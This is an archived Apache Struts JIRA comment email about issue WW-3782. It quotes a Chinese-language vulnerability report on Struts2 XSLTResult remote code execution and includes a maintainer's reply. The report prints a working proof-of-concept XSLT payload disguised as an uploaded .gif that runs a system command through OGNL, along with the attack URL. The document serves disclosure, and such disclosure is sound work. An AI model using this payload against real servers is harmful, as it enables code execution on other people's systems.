[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞

Lukasz Lenart (Commented) (JIRA) Thu, 22 Mar 2012 01:04:51 -0700

    [ 
https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235434#comment-13235434
 ]


Lukasz Lenart commented on WW-3782:
-----------------------------------

First you're talking about some file upload issue with the XSLT plugin, next 
your're presenting some hardcoded code with call to static methods (which can 
be blocked by setting up configuration flag).

And first of all, please report any security issues throughout 
[email protected]
                
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Critical
>              Labels: patch
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型，其中包括XSLT类型，这种类型允许接受用户提交一个文件地址，并且去解析它为XSLT文件，无论扩展名是什么。
>  这是XSLTResult文件代码：
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = 
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult，攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action：
> <action name="xslt" class="net.inbreak.xsltAction">
>    <result type="xslt"/>
> </action>
> XSLT解析，允许执行java静态方法，所以，攻击者只要上传一个文件在服务器上
> 例如：
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform";
>                version="1.0" xmlns:ognl="ognl.Ognl">
>       <xsl:template match="/">
>               <html> 
>                       <body> 
>                          <h2>hacked by kxlzx</h2> 
>                          <h2>http://www.inbreak.net</h2> 
>                          <exp>
>                                        <xsl:value-of 
> select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
>                               </exp>
>                       </body> 
>               </html> 
>       </xsl:template> 
> </xsl:stylesheet>
> 这个xsl文件解析时，会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>  
> http://www.inbreak.net/xslt.action
>  
> 那么，攻击者就可以提交
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: 
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira

[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞

Reply via email to